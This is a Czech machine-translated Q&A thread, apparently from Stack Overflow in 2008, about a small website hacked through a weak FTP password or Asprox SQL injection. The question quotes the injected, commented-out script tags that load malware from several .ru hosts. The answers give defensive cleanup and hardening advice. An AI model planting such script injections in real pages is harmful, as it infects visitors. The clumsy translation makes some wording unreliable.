Můj web dostal hacknutý .. Co mám dělat?

hlasů
18

Můj táta mi volal dnes řekl lidi do svých internetových stránkách dostávali 168 virů se snaží stáhnout do svého počítače. On není technický vůbec, a stavěl celou věc s WYSIWYG editorem.

Vyskočila jsem jeho stránky otevřené a při pohledu na zdroje, a tam byla řada Javascript obsahuje ve spodní části zdroje těsně před uzavírací značku HTML. Jsou součástí tohoto souboru (mimo jiné): http://www.98hs.ru/js.js <- JavaScript zakázat, než půjdete do této adresy URL.

Takže jsem komentoval to pro tuto chvíli. Ukázalo se, že jeho heslo FTP byl prostý slovníku slovo šest dopisů dlouho, takže si myslíme, že je to, jak to mám hacknutý. Změnili jsme své heslo k 8+ místný non-textového řetězce (nechtěl jít na přístupové heslo, protože je to hon-n-klovat Typer).

Udělal jsem si whois na 98hs.ru a zjistil, že je umístěn ze serveru v Chile. Tam je vlastně e-mailová adresa spojená s ní taky, ale vážně pochybuji, tento člověk je viník. Asi jen nějaké jiné místo, které dostal hacknutý ...

Nemám tušení, co dělat v této chvíli i když, jak jsem nikdy zabýval takové věci předtím. Každý, kdo má nějaké návrhy?

Použil plain jane un-zajištěné ftp přes webhost4life.com. Já ani vidět způsob, jak dělat SFTP na svých stránkách. Přemýšlím jeho uživatelské jméno a heslo dostal zachytil?

Tak, aby to více relevantní ke komunitě, jaké jsou kroky byste měli vzít / osvědčené postupy byste měli dodržovat, aby chránit vaše webové stránky od získání hacknutý?

Pro záznam, zde je řádek kódu, který „magicky“ dostal přidal se k jeho souboru (a není v jeho souboru na svém počítači - nechal jsem to komentoval ven jen aby absolutně jistý, že to nebude nic dělat na této stránce, i když jsem si jistý, že Jeff by chránit proti tomu):

<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script-->
Položena 06/08/2008 v 00:55
zdroj uživatelem
V jiných jazycích...                            


8 odpovědí

hlasů
14

Vím, že to je trochu pozdě ve hře, ale URL uvedena JavaScriptu je uveden v seznamu lokalit je známo, že byli součástí bot oživení ASPRox, která byla zahájena v červnu (alespoň to, když jsme byli stále označeny s to). Některé podrobnosti o ní jsou uvedeny níže:

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

Ošklivé věc na tom je, že skutečně každý typ pole varchar v databázi „infikován“ vyplivnout odkaz na tuto adresu URL, ve kterém je prohlížeč dostane malý iframe, který ji promění bot. Základní SQL Oprava pro tento příklad lze nalézt zde:

http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx

Děsivá věc však je, že virus se dívá na systémové tabulky pro hodnoty infikovat a hodně sdílený hosting plány také sdílet prostor databáze pro své klienty. Takže s největší pravděpodobností to byl pozemek ani vašeho táty, který byl napaden, ale někoho jiného webu v rámci svého hostování clusteru, který napsal nějaký špatný kód a otevřel dveře k SQL injection útoku.

Pokud by se to ještě neudělali, tak bych poslat naléhavou e-mail na jejich hostitele a dát jim odkaz na tomto serveru SQL kódu na opravu celého systému. Můžete opravit své vlastní ovlivněny databázové tabulky, ale s největší pravděpodobností roboty, které dělají infekce jdou projít skrz tu díru znovu a nakazit spoustu.

Doufejme, že to vám dává nějaké další informace k práci s.

EDIT: Ještě jedna rychlá myšlenka, jestli je jedním z hostitelů on návrhářských nástrojů pro budování své webové stránky, všechny tohoto obsahu je pravděpodobně sedí v koloně a byla infikována tímto způsobem.

Odpovězeno 07/08/2008 v 23:49
zdroj uživatelem

hlasů
13

Pokusit se získat co nejvíce informací, jak můžete. Podívejte se, zda hostitel vám může dát log zobrazující všechny FTP připojení, které byly provedeny na váš účet. Můžete použít ty, aby zjistil, jestli to bylo dokonce připojení k FTP, která byla použita k provedení změn a případně získat IP adresu.

Pokud používáte balené software, jako je Wordpress, Drupal, nebo cokoliv jiného, ​​že jste kódovat může být zranitelná místa v nahrání kódu, který umožňuje pro tento druh modifikace. Pokud je na zakázku postavený, dvakrát zkontrolujte žádná místa, kde umožňují uživatelům vkládat nebo upravovat existující soubory.

Druhá věc, kterou by bylo vzít výpis z místa tak, jak je a kontrolovat vše, co pro další úpravy. Může to být jen jedna jediná změna udělali, ale když se dostali dovnitř přes FTP, kdo ví, co ještě je tam nahoře.

Vrátit svůj web zpět do známého dobrého stavu, a pokud to bude nutné, upgrade na nejnovější verzi.

Tam je míra návratnosti budete muset vzít v úvahu také. Je škoda stojí za pokus sledovat osobu dolů, nebo je to něco, kde si jen žít a učit se a používat silnější hesla?

Odpovězeno 06/08/2008 v 01:16
zdroj uživatelem

hlasů
5

Zmínil jste váš táta byl za použití publikování webových stránek nástroj.

Pokud nástroj nakladatelství vydává ze svého počítače na server, může to být v případě, že jeho místní soubory jsou čisté a že se prostě musí publikovat na server.

Měl by zjistit, jestli tam je jiný způsob přihlášení ke svému serveru, než obyčejný FTP, i když ... to není moc bezpečné, protože to vysílá své heslo jako prostého textu přes internet.

Odpovězeno 06/08/2008 v 04:31
zdroj uživatelem

hlasů
3

Heslem šesti slovní znak, že může být brutální nuceni. To je pravděpodobnější než jeho ftp právě zachycen, ale je možné, že příliš.

Začněte s silnější hesla. (8 znaků, je stále poměrně slabá)

Uvidíme, jestli tento odkaz na internet bezpečnostní blog je užitečné.

Odpovězeno 06/08/2008 v 01:00
zdroj uživatelem

hlasů
2

Je pozemek prostě statické HTML? tedy že se nepodařilo kód sám stránku nahrávání, který umožňuje komukoli jízdy od právo ohrožena scripts / stránky?

Proč ne ptát webhost4life, jestli mají nějaké protokoly FTP k dispozici a nahlásit problém s nimi. Člověk nikdy neví, ale může být docela vnímavý a zjistit, pro vás, co přesně se stalo?

Pracuji pro sdílené hostitele a my vždy vítány zprávy, jako jsou tyto, a většinou je možné přesně určit vektor útoku založeného a radit o tom, kde se zákazník pokazilo.

Odpovězeno 06/08/2008 v 01:24
zdroj uživatelem

hlasů
0

To se stalo na můj klient v poslední době, který byl umístěn na iPower. Nejsem si jistý, jestli vaše hostování prostředí bylo založeno Apache, ale kdyby to bylo určitě zkontrolovat pro .htaccess souborů, které jste nevytvořili, a to zejména nad webroot a uvnitř obrazových adresářů, protože mají tendenci aplikovat nějaké ošklivosti tam stejně tak (byli přesměrování lidi v závislosti na tom, kde přišli v odkazovat). Také zkontrolujte všechny, které jste si vytvořit pro kód, který jste nenapsal.

Odpovězeno 26/09/2008 v 21:21
zdroj uživatelem

hlasů
0

Odpojte webserver bez jeho vypnutí, aby se zabránilo vypnutí skripty. Analyzovat pevný disk pomocí jiného počítače jako datového disku a zjistit, jestli je možné určit viníka prostřednictvím souborů protokolu a věci tohoto druhu. Ověřte, že kód je bezpečná a poté jej obnovit ze zálohy.

Odpovězeno 26/09/2008 v 21:12
zdroj uživatelem

hlasů
-1

Měli jsme byly napadeny ze stejných kluků zdánlivě! Nebo roboty, v našem případě. Oni používali SQL injection v URL na některé staré klasické ASP stránky, které už nikdo udržují. Zjistili jsme, útočící IP adres a zablokoval je v IIS. Nyní musíme refaktorovat všechno staré ASP. Takže moje rada je, aby se podívat na IIS přihlásí nejprve zjistit, zda je problém v konfiguraci kódu nebo serveru vašich stránek.

Odpovězeno 16/08/2008 v 17:35
zdroj uživatelem

Cookies help us deliver our services. By using our services, you agree to our use of cookies. Learn more